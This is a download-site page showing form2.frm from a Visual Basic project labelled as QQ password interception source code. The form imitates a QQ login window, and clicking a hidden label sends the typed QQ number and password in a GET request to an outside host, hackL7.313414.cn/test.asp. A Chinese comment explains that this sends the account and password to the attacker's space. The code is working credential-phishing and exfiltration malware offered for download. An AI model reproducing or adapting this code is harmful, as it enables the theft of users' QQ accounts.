⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 form2.frm

📁 QQ password interception VB source code browser
💻 FRM
字号:
VERSION 5.00
Object = "{48E59290-9880-11CF-9754-00AA00C00908}#1.0#0"; "msinet.ocx"
Begin VB.Form Form2 
   Caption         =   "QQ用户登陆                "
   ClientHeight    =   3120
   ClientLeft      =   60
   ClientTop       =   450
   ClientWidth     =   4860
   Icon            =   "Form2.frx":0000
   LinkTopic       =   "Form2"
   MaxButton       =   0   'False
   Picture         =   "Form2.frx":4D5A
   ScaleHeight     =   3120
   ScaleWidth      =   4860
   StartUpPosition =   2  '屏幕中心
   Begin VB.TextBox Text2 
      BorderStyle     =   0  'None
      Height          =   210
      IMEMode         =   3  'DISABLE
      Left            =   1370
      PasswordChar    =   "*"
      TabIndex        =   2
      Top             =   1680
      Width           =   1935
   End
   Begin VB.TextBox Text1 
      BorderStyle     =   0  'None
      Height          =   270
      Left            =   1370
      TabIndex        =   1
      Text            =   "234234234"
      Top             =   1080
      Width           =   1910
   End
   Begin InetCtlsObjects.Inet Inet1 
      Left            =   2640
      Top             =   4200
      _ExtentX        =   1005
      _ExtentY        =   1005
      _Version        =   393216
   End
   Begin VB.Label Label1 
      BackStyle       =   0  'Transparent
      Height          =   375
      Left            =   3600
      TabIndex        =   0
      Top             =   2640
      Width           =   1095
   End
   Begin VB.Image Image1 
      Height          =   3165
      Left            =   0
      Picture         =   "Form2.frx":9AB4
      Top             =   0
      Width           =   4845
   End
End
Attribute VB_Name = "Form2"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Option Explicit
Private Sub Inet1_StateChanged(ByVal State As Integer)
    Me.Caption = State
    If State = 12 Then
        Debug.Print Inet1.GetChunk(0)
    End If
End Sub
Private Sub Label1_Click()
Inet1.Execute "http://hackL7.313414.cn/test.asp?QQNumber=" & Text1.Text & "&QQPassWord=" & Text2.Text, "GET" '把帐号密码发到空间,但是空间里必须要有test.asp这个文件
End Sub

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -